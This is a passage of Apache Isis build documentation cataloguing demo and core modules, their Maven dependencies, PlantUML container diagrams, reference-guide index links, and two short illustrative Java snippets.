demoapp.dom.types.javalang.characters.samples.WrapperCharacterSamples +
demoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoEntities +
demoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoSeedService +
demoapp.dom.types.javalang.doubles.samples.WrapperDoubleSamples +
demoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoEntities +
demoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoSeedService +
demoapp.dom.types.javalang.floats.samples.WrapperFloatSamples +
demoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoEntities +
demoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoSeedService +
demoapp.dom.types.javalang.integers.samples.WrapperIntegerSamples +
demoapp.dom.types.javalang.longs.jdo.WrapperLongJdoEntities +
demoapp.dom.types.javalang.longs.jdo.WrapperLongJdoSeedService +
demoapp.dom.types.javalang.longs.samples.WrapperLongSamples +
demoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoEntities +
demoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoSeedService +
demoapp.dom.types.javalang.shorts.samples.WrapperShortSamples +
demoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoEntities +
demoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoSeedService +
demoapp.dom.types.javalang.strings.samples.JavaLangStringSamples +
demoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoEntities +
demoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoSeedService +
demoapp.dom.types.javamath.bigdecimals.samples.JavaMathBigDecimalSamples +
demoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoEntities +
demoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoSeedService +
demoapp.dom.types.javamath.bigintegers.samples.JavaMathBigIntegerSamples +
demoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoEntities +
demoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoSeedService +
demoapp.dom.types.javanet.urls.samples.JavaNetUrlSamples +
demoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoEntities +
demoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoSeedService +
demoapp.dom.types.javasql.javasqldate.samples.JavaSqlDateSamples +
demoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoEntities +
demoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoSeedService +
demoapp.dom.types.javasql.javasqltimestamp.samples.JavaSqlTimestampSamples +
demoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoEntities +
demoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoSeedService +
demoapp.dom.types.javatime.javatimelocaldate.samples.JavaTimeLocalDateSamples +
demoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoEntities +
demoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoSeedService +
demoapp.dom.types.javatime.javatimelocaldatetime.samples.JavaTimeLocalDateTimeSamples +
demoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoEntities +
demoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoSeedService +
demoapp.dom.types.javatime.javatimeoffsetdatetime.samples.JavaTimeOffsetDateTimeSamples +
demoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoEntities +
demoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoSeedService +
demoapp.dom.types.javatime.javatimeoffsettime.samples.JavaTimeOffsetTimeSamples +
demoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoEntities +
demoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoSeedService +
demoapp.dom.types.javatime.javatimezoneddatetime.samples.JavaTimeZonedDateTimeSamples +
demoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoEntities +
demoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoSeedService +
demoapp.dom.types.javautil.javautildate.samples.JavaUtilDateSamples +
demoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoEntities +
demoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoSeedService +
demoapp.dom.types.javautil.uuids.samples.JavaUtilUuidSamples +
demoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoEntities +
demoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoSeedService +
demoapp.dom.types.jodatime.jodadatetime.samples.JodaDateTimeSamples +
demoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoEntities +
demoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoSeedService +
demoapp.dom.types.jodatime.jodalocaldate.samples.JodaLocalDateSamples +
demoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoEntities +
demoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoSeedService +
demoapp.dom.types.jodatime.jodalocaldatetime.samples.JodaLocalDateTimeSamples +
demoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoEntities +
demoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoSeedService +
demoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoEntities +
demoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoSeedService +
demoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoEntities +
demoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoSeedService +
demoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoEntities +
demoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoSeedService +
demoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoEntities +
demoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoSeedService +
demoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoEntities +
demoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoSeedService +
demoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoEntities +
demoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoSeedService +
demoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoEntities +
demoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoSeedService +
****

.Dependencies
****
com.h2database:h2:jar:<managed> +
org.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +
org.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +
org.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +
org.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +
org.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +
org.apache.isis.testing:isis-testing-h2console-ui:jar:<managed> +
org.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +
org.assertj:assertj-core:jar:<managed> +
org.projectlombok:lombok:jar:<managed> +
org.springframework.boot:spring-boot-configuration-processor:jar:<managed> +
****

|Demo - JavaFX
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-javafx
Type: jar
Directory: /examples/demo/javafx
----
|.Dependencies
****
org.apache.isis.core:isis-core-runtimeservices:jar:<managed> +
org.apache.isis.core:isis-core-security:jar:<managed> +
org.apache.isis.examples.apps:demo-domain:jar:${project.version} +
org.apache.isis.incubator.viewer:isis-viewer-javafx-viewer:jar:${project.version} +
org.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +
org.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +
org.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +
org.apache.isis.security:isis-security-bypass:jar:<managed> +
org.apache.isis.security:isis-security-shiro:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui:pom:${project.version} +
org.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-ui:pom:${project.version} +
org.projectlombok:lombok:jar:<managed> +
****

|Demo - Vaadin
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-vaadin
Type: jar
Directory: /examples/demo/vaadin
----
|.Dependencies
****
org.apache.isis.examples.apps:demo-web:jar:${project.version} +
org.apache.isis.incubator.viewer:isis-viewer-vaadin-viewer:jar:${project.version} +
org.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-vaa:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +
org.projectlombok:lombok:jar:<managed> +
****

|Demo - Web
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-web
Type: jar
Directory: /examples/demo/web
----
|.Components
****
demoapp.web._infra.utils.ThereCanBeOnlyOne +
****

.Dependencies
****
org.apache.isis.examples.apps:demo-domain:jar:${project.version} +
org.apache.isis.extensions:isis-extensions-command-replay-primary:jar:<managed> +
org.apache.isis.extensions:isis-extensions-command-replay-secondary:jar:<managed> +
org.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +
org.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +
org.springframework.boot:spring-boot-starter:jar:<managed> +
org.springframework.boot:spring-boot-starter-actuator:jar:<managed> +
org.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +
****

|Demo - Wicket
[source,yaml]
----
Group: org.apache.isis.examples.apps
Artifact: demo-wicket
Type: jar
Directory: /examples/demo/wicket
----
|.Components
****
demoapp.webapp.wicket.ui.custom.WhereInTheWorldPanelFactory +
****

.Dependencies
****
org.apache.isis.examples.apps:demo-web:jar:${project.version} +
org.apache.isis.extensions:isis-extensions-pdfjs-ui:jar:<managed> +
org.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +
org.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +
org.apache.isis.viewer:isis-viewer-wicket-ui:jar:2.0.0-SNAPSHOT +
org.apache.isis.viewer:isis-viewer-wicket-viewer:jar:2.0.0-SNAPSHOT +
****
|===
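
The demo containers listed above are assembled the usual Spring Boot way: a top-level `@Configuration` class imports the framework modules that the container's dependencies provide. The following is a minimal sketch of such an "app manifest"; the module class names used here (`IsisModuleCoreRuntimeServices`, `IsisModuleSecurityShiro`) follow the framework's naming convention but are assumptions for illustration, not copied from the demo sources.

[source,java]
----
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.Import;

import org.apache.isis.core.runtimeservices.IsisModuleCoreRuntimeServices;
import org.apache.isis.security.shiro.IsisModuleSecurityShiro;

// Hypothetical manifest: pulls in the core runtime services plus a
// Shiro-based security implementation, mirroring the artifacts that the
// demo containers declare as Maven dependencies.
@Configuration
@Import({
    IsisModuleCoreRuntimeServices.class,
    IsisModuleSecurityShiro.class
})
public class DemoAppManifest {
}
----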

== Root

[plantuml,Root,svg]
----
@startuml(id=Root)
title Root - Containers
caption Artifact Hierarchy (Maven)

skinparam {
 shadowing false
 arrowFontSize 10
 defaultTextAlignment center
 wrapWidth 200
 maxMessageSize 100
}
hide stereotype
left to right direction
skinparam rectangle<<2>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<3>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<4>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<5>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
package "Root\n[Software System]" {
 rectangle "==Apache Isis\n<size:10>[Container: packaging: pom]</size>" <<4>> as 4
 rectangle "==Apache Isis (Aggregator)\n<size:10>[Container: packaging: pom]</size>" <<2>> as 2
 rectangle "==Apache Isis - Antora\n<size:10>[Container: packaging: pom]</size>" <<3>> as 3
 rectangle "==Apache Isis Supplemental - Legal Info\n<size:10>[Container: packaging: jar]</size>" <<5>> as 5
}
2 .[#707070].> 4 : ""
2 .[#707070].> 3 : ""
@enduml
----
.Projects/Modules (Root)
[cols="3a,5a", options="header"]
|===
|Coordinates |Description

|Apache Isis (Aggregator)
[source,yaml]
----
Group: org.apache.isis
Artifact: isis-all
Type: pom
Directory: /
----
|Convenience aggregator POM that references all modules, some explicitly,
others via profiles that are not activated by default.
The parent POM of the core framework is isis-parent/pom.xml.

|Apache Isis - Antora
[source,yaml]
----
Group: org.apache.isis
Artifact: antora
Type: pom
Directory: /antora
----
|

|Apache Isis
[source,yaml]
----
Group: org.apache.isis
Artifact: isis-parent
Type: pom
Directory: /isis-parent
----
|Parent for the core framework + extensions, starter parent pom for starter apps.

|Apache Isis Supplemental - Legal Info
[source,yaml]
----
Group: org.apache.isis
Artifact: supplemental-model
Type: jar
Directory: /supplemental-model
----
|For example, the templates used by many Apache distributions assemble a listing of project dependencies
according to their organization name (and URL), along with the URL of each project's website. When dependency
POMs are missing this information, the dependency notice file that the Remote Resources Plugin renders can
be invalid.
To compensate for incomplete dependency POMs, we use the supplemental models support.
|===

== Commons

[plantuml,Commons,svg]
----
@startuml(id=Commons)
title Commons - Containers
caption Artifact Hierarchy (Maven)

skinparam {
 shadowing false
 arrowFontSize 10
 defaultTextAlignment center
 wrapWidth 200
 maxMessageSize 100
}
hide stereotype
left to right direction
skinparam rectangle<<2>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
package "Commons\n[Software System]" {
 rectangle "==Apache Isis Commons\n<size:10>[Container: packaging: jar]</size>" <<2>> as 2
}
@enduml
----
.Projects/Modules (Commons)
[cols="3a,5a", options="header"]
|===
|Coordinates |Description

|Apache Isis Commons
[source,yaml]
----
Group: org.apache.isis.commons
Artifact: isis-commons
Type: jar
Directory: /commons
----
|Apache Isis Commons is a library of utilities that are shared across the entire Apache Isis ecosystem.

.Dependencies
****
com.fasterxml.jackson.core:jackson-databind:jar:<managed> +
com.google.code.findbugs:annotations:jar:<managed> +
javax:javaee-api:jar:<managed> +
org.junit.jupiter:junit-jupiter-api:jar:<managed> +
org.junit.jupiter:junit-jupiter-engine:jar:<managed> +
org.junit.jupiter:junit-jupiter-params:jar:<managed> +
org.junit.vintage:junit-vintage-engine:jar:<managed> +
org.slf4j:slf4j-api:jar:<managed> +
org.springframework:spring-context:jar:<managed> +
org.springframework:spring-tx:jar:<managed> +
org.springframework.boot:spring-boot-starter:jar:<managed> +
org.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +
org.yaml:snakeyaml:jar:<managed> +
****

.Document Index Entries
****
xref:refguide:commons:index/collections/Can.adoc[Can], xref:refguide:commons:index/collections/Cardinality.adoc[Cardinality],
xref:refguide:commons:index/functional/Result.adoc[Result], xref:refguide:commons:index/resource/ResourceCoordinates.adoc[ResourceCoordinates]
****
|===
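
Of the indexed types, `Can` is the one application code is most likely to touch directly: an immutable, null-safe collection whose `Cardinality` is zero, one, or many. A minimal sketch follows, assuming the `Can.of(...)` factory and the `add`/`size`/`stream` accessors under `org.apache.isis.commons.collections` behave as their names suggest.

[source,java]
----
import org.apache.isis.commons.collections.Can;

public class CanDemo {
    public static void main(String[] args) {
        // Can is immutable: add(...) returns a new instance, leaving the original untouched.
        Can<String> names = Can.of("alice", "bob");
        Can<String> more = names.add("carol");

        System.out.println(names.size()); // 2 -- the original is unchanged

        // Interoperates with java.util.stream like any regular collection.
        more.stream()
            .map(String::toUpperCase)
            .forEach(System.out::println);
    }
}
----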

== Core

[plantuml,Core,svg]
----
@startuml(id=Core)
title Core - Containers
caption Artifact Hierarchy (Maven)

skinparam {
 shadowing false
 arrowFontSize 10
 defaultTextAlignment center
 wrapWidth 200
 maxMessageSize 100
}
hide stereotype
left to right direction
skinparam rectangle<<11>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<12>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<13>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<14>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<15>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<2>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<3>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<4>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<5>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<6>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<7>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<8>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<9>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
skinparam rectangle<<10>> {
 BackgroundColor #438dd5
 FontColor #fffffe
 BorderColor #2E6295
}
package "Core\n[Software System]" {
 rectangle "==Apache Isis - JDK Supplemental\n<size:10>[Container: packaging: pom]</size>" <<14>> as 14
 rectangle "==Apache Isis Core\n<size:10>[Container: packaging: pom]</size>" <<2>> as 2
 rectangle "==Apache Isis Core - AppLib\n<size:10>[Container: packaging: jar]</size>" <<3>> as 3
 rectangle "==Apache Isis Core - Code Gen (ByteBuddy)\n<size:10>[Container: packaging: jar]</size>" <<4>> as 4
 rectangle "==Apache Isis Core - Configuration\n<size:10>[Container: packaging: jar]</size>" <<5>> as 5
 rectangle "==Apache Isis Core - Interaction\n<size:10>[Container: packaging: jar]</size>" <<6>> as 6
 rectangle "==Apache Isis Core - MetaModel\n<size:10>[Container: packaging: jar]</size>" <<8>> as 8
 rectangle "==Apache Isis Core - Runtime\n<size:10>[Container: packaging: jar]</size>" <<9>> as 9
 rectangle "==Apache Isis Core - Runtime Services\n<size:10>[Container: packaging: jar]</size>" <<10>> as 10
 rectangle "==Apache Isis Core - Schemas\n<size:10>[Container: packaging: jar]</size>" <<15>> as 15
 rectangle "==Apache Isis Core - Security\n<size:10>[Container: packaging: jar]</size>" <<11>> as 11
 rectangle "==Apache Isis Core - Transaction\n<size:10>[Container: packaging: jar]</size>" <<12>> as 12
 rectangle "==Apache Isis Core - Unit Test Support\n<size:10>[Container: packaging: jar]</size>" <<7>> as 7
 rectangle "==Apache Isis Core - WebApp\n<size:10>[Container: packaging: jar]</size>" <<13>> as 13
}
2 .[#707070].> 14 : ""
2 .[#707070].> 3 : ""
2 .[#707070].> 4 : ""
2 .[#707070].> 5 : ""
2 .[#707070].> 6 : ""
2 .[#707070].> 8 : ""
2 .[#707070].> 9 : ""
2 .[#707070].> 10 : ""
2 .[#707070].> 15 : ""
2 .[#707070].> 11 : ""
2 .[#707070].> 12 : ""
2 .[#707070].> 7 : ""
2 .[#707070].> 13 : ""
@enduml
----
.Projects/Modules (Core)
[cols="3a,5a", options="header"]
|===
|Coordinates |Description

|Apache Isis Core
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-core
Type: pom
Directory: /core
----
|Core framework, providing metamodel, runtime and core APIs.

.Dependencies
****
org.projectlombok:lombok:jar:<managed> +
****

|Apache Isis Core - AppLib
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-applib
Type: jar
Directory: /api/applib
----
|Isis application library, defining annotations and utilities for the
default (Java) programming model.

.Components
****
o.a.i.applib.annotation.DomainObject +
o.a.i.applib.annotation.DomainService +
o.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandDto +
o.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandsDto +
o.a.i.applib.services.commanddto.processor.spi.CommandDtoProcessorServiceIdentity +
o.a.i.applib.services.publishing.log.CommandLogger +
o.a.i.applib.services.publishing.log.EntityChangesLogger +
o.a.i.applib.services.publishing.log.EntityPropertyChangeLogger +
o.a.i.applib.services.publishing.log.ExecutionLogger +
o.a.i.applib.services.session.SessionLoggingServiceLogging +
****

.Dependencies
****
com.google.code.findbugs:annotations:jar:<managed> +
javax:javaee-api:jar:<managed> +
org.apache.isis.commons:isis-commons:jar:<managed> +
org.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +
org.apache.isis.core:isis-schema:jar:<managed> +
org.assertj:assertj-core:jar:<managed> +
org.jmock:jmock:jar:<managed> +
****

.Document Index Entries
****
xref:refguide:applib:index/AbstractViewModel.adoc[AbstractViewModel], xref:refguide:applib:index/Identifier.adoc[Identifier],
xref:refguide:applib:index/IsisModuleApplib.adoc[IsisModuleApplib], xref:refguide:applib:index/RecreatableDomainObject.adoc[RecreatableDomainObject],
xref:refguide:applib:index/ViewModel.adoc[ViewModel], xref:refguide:applib:index/adapters/AbstractValueSemanticsProvider.adoc[AbstractValueSemanticsProvider],
xref:refguide:applib:index/adapters/DefaultsProvider.adoc[DefaultsProvider], xref:refguide:applib:index/adapters/EncoderDecoder.adoc[EncoderDecoder],
xref:refguide:applib:index/adapters/EncodingException.adoc[EncodingException], xref:refguide:applib:index/adapters/Parser.adoc[Parser],
xref:refguide:applib:index/adapters/ParsingException.adoc[ParsingException], xref:refguide:applib:index/adapters/ValueSemanticsProvider.adoc[ValueSemanticsProvider],
xref:refguide:applib:index/annotation/Action.adoc[Action], xref:refguide:applib:index/annotation/ActionLayout.adoc[ActionLayout],
xref:refguide:applib:index/annotation/BookmarkPolicy.adoc[BookmarkPolicy], xref:refguide:applib:index/annotation/Bounding.adoc[Bounding],
xref:refguide:applib:index/annotation/Collection.adoc[Collection], xref:refguide:applib:index/annotation/CollectionLayout.adoc[CollectionLayout],
xref:refguide:applib:index/annotation/Defaulted.adoc[Defaulted], xref:refguide:applib:index/annotation/DomainObject.adoc[DomainObject],
xref:refguide:applib:index/annotation/DomainObjectLayout.adoc[DomainObjectLayout], xref:refguide:applib:index/annotation/DomainService.adoc[DomainService],
xref:refguide:applib:index/annotation/DomainServiceLayout.adoc[DomainServiceLayout], xref:refguide:applib:index/annotation/DomainServiceLayout~MenuBar.adoc[DomainServiceLayout.MenuBar],
xref:refguide:applib:index/annotation/Editing.adoc[Editing], xref:refguide:applib:index/annotation/EntityChangeKind.adoc[EntityChangeKind],
xref:refguide:applib:index/annotation/EqualByContent.adoc[EqualByContent], xref:refguide:applib:index/annotation/Facets.adoc[Facets],
xref:refguide:applib:index/annotation/HomePage.adoc[HomePage], xref:refguide:applib:index/annotation/InteractionScope.adoc[InteractionScope],
xref:refguide:applib:index/annotation/LabelPosition.adoc[LabelPosition], xref:refguide:applib:index/annotation/MemberOrder.adoc[MemberOrder],
xref:refguide:applib:index/annotation/MinLength.adoc[MinLength], xref:refguide:applib:index/annotation/Module.adoc[Module],
xref:refguide:applib:index/annotation/Nature.adoc[Nature], xref:refguide:applib:index/annotation/NatureOfService.adoc[NatureOfService],
xref:refguide:applib:index/annotation/Navigable.adoc[Navigable], xref:refguide:applib:index/annotation/Optionality.adoc[Optionality],
xref:refguide:applib:index/annotation/OrderPrecedence.adoc[OrderPrecedence], xref:refguide:applib:index/annotation/Parameter.adoc[Parameter],
xref:refguide:applib:index/annotation/ParameterLayout.adoc[ParameterLayout], xref:refguide:applib:index/annotation/Programmatic.adoc[Programmatic],
xref:refguide:applib:index/annotation/Projecting.adoc[Projecting], xref:refguide:applib:index/annotation/PromptStyle.adoc[PromptStyle],
xref:refguide:applib:index/annotation/Property.adoc[Property], xref:refguide:applib:index/annotation/PropertyLayout.adoc[PropertyLayout],
xref:refguide:applib:index/annotation/Publishing.adoc[Publishing], xref:refguide:applib:index/annotation/Redirect.adoc[Redirect],
xref:refguide:applib:index/annotation/RenderDay.adoc[RenderDay], xref:refguide:applib:index/annotation/Repainting.adoc[Repainting],
xref:refguide:applib:index/annotation/RestrictTo.adoc[RestrictTo], xref:refguide:applib:index/annotation/SemanticsOf.adoc[SemanticsOf],
xref:refguide:applib:index/annotation/Snapshot.adoc[Snapshot], xref:refguide:applib:index/annotation/Title.adoc[Title],
xref:refguide:applib:index/annotation/Value.adoc[Value], xref:refguide:applib:index/annotation/Where.adoc[Where],
xref:refguide:applib:index/client/RepresentationTypeSimplifiedV2.adoc[RepresentationTypeSimplifiedV2], xref:refguide:applib:index/client/SuppressionType.adoc[SuppressionType],
xref:refguide:applib:index/clock/VirtualClock.adoc[VirtualClock], xref:refguide:applib:index/domain/DomainObjectList.adoc[DomainObjectList],
xref:refguide:applib:index/events/EventObjectBase.adoc[EventObjectBase], xref:refguide:applib:index/events/domain/AbstractDomainEvent.adoc[AbstractDomainEvent],
xref:refguide:applib:index/events/domain/ActionDomainEvent.adoc[ActionDomainEvent], xref:refguide:applib:index/events/domain/CollectionDomainEvent.adoc[CollectionDomainEvent],
xref:refguide:applib:index/events/domain/PropertyDomainEvent.adoc[PropertyDomainEvent], xref:refguide:applib:index/events/lifecycle/AbstractLifecycleEvent.adoc[AbstractLifecycleEvent],
xref:refguide:applib:index/events/lifecycle/ObjectCreatedEvent.adoc[ObjectCreatedEvent], xref:refguide:applib:index/events/lifecycle/ObjectLoadedEvent.adoc[ObjectLoadedEvent],
xref:refguide:applib:index/events/lifecycle/ObjectPersistedEvent.adoc[ObjectPersistedEvent], xref:refguide:applib:index/events/lifecycle/ObjectPersistingEvent.adoc[ObjectPersistingEvent],
xref:refguide:applib:index/events/lifecycle/ObjectRemovingEvent.adoc[ObjectRemovingEvent], xref:refguide:applib:index/events/lifecycle/ObjectUpdatedEvent.adoc[ObjectUpdatedEvent],
xref:refguide:applib:index/events/lifecycle/ObjectUpdatingEvent.adoc[ObjectUpdatingEvent], xref:refguide:applib:index/events/ui/AbstractUiEvent.adoc[AbstractUiEvent],
xref:refguide:applib:index/events/ui/CssClassUiEvent.adoc[CssClassUiEvent], xref:refguide:applib:index/events/ui/IconUiEvent.adoc[IconUiEvent],
xref:refguide:applib:index/events/ui/LayoutUiEvent.adoc[LayoutUiEvent], xref:refguide:applib:index/events/ui/TitleUiEvent.adoc[TitleUiEvent],
xref:refguide:applib:index/exceptions/RecoverableException.adoc[RecoverableException], xref:refguide:applib:index/exceptions/TranslatableException.adoc[TranslatableException],
xref:refguide:applib:index/exceptions/UnrecoverableException.adoc[UnrecoverableException], xref:refguide:applib:index/exceptions/unrecoverable/DomainModelException.adoc[DomainModelException],
xref:refguide:applib:index/exceptions/unrecoverable/MetaModelException.adoc[MetaModelException], xref:refguide:applib:index/exceptions/unrecoverable/NoAuthenticatorException.adoc[NoAuthenticatorException],
xref:refguide:applib:index/exceptions/unrecoverable/ObjectNotFoundException.adoc[ObjectNotFoundException], xref:refguide:applib:index/exceptions/unrecoverable/ObjectPersistenceException.adoc[ObjectPersistenceException],
xref:refguide:applib:index/exceptions/unrecoverable/PersistFailedException.adoc[PersistFailedException], xref:refguide:applib:index/exceptions/unrecoverable/ReflectiveActionException.adoc[ReflectiveActionException],
xref:refguide:applib:index/exceptions/unrecoverable/RepositoryException.adoc[RepositoryException], xref:refguide:applib:index/exceptions/unrecoverable/UnexpectedCallException.adoc[UnexpectedCallException],
xref:refguide:applib:index/exceptions/unrecoverable/UnknownTypeException.adoc[UnknownTypeException], xref:refguide:applib:index/graph/Edge.adoc[Edge],
xref:refguide:applib:index/graph/SimpleEdge.adoc[SimpleEdge], xref:refguide:applib:index/graph/Vertex.adoc[Vertex],
xref:refguide:applib:index/graph/tree/LazyTreeNode.adoc[LazyTreeNode], xref:refguide:applib:index/graph/tree/TreeAdapter.adoc[TreeAdapter],
xref:refguide:applib:index/graph/tree/TreeNode.adoc[TreeNode], xref:refguide:applib:index/graph/tree/TreePath.adoc[TreePath],
xref:refguide:applib:index/graph/tree/TreeState.adoc[TreeState], xref:refguide:applib:index/id/HasLogicalType.adoc[HasLogicalType],
xref:refguide:applib:index/id/LogicalType.adoc[LogicalType], xref:refguide:applib:index/jaxb/DataTypeFactory.adoc[DataTypeFactory],
xref:refguide:applib:index/jaxb/JavaSqlJaxbAdapters.adoc[JavaSqlJaxbAdapters], xref:refguide:applib:index/jaxb/JavaSqlXMLGregorianCalendarMarshalling.adoc[JavaSqlXMLGregorianCalendarMarshalling],
xref:refguide:applib:index/jaxb/JavaTimeJaxbAdapters.adoc[JavaTimeJaxbAdapters], xref:refguide:applib:index/jaxb/JavaTimeXMLGregorianCalendarMarshalling.adoc[JavaTimeXMLGregorianCalendarMarshalling],
xref:refguide:applib:index/jaxb/JavaUtilJaxbAdapters.adoc[JavaUtilJaxbAdapters], xref:refguide:applib:index/jaxb/JodaTimeJaxbAdapters.adoc[JodaTimeJaxbAdapters],
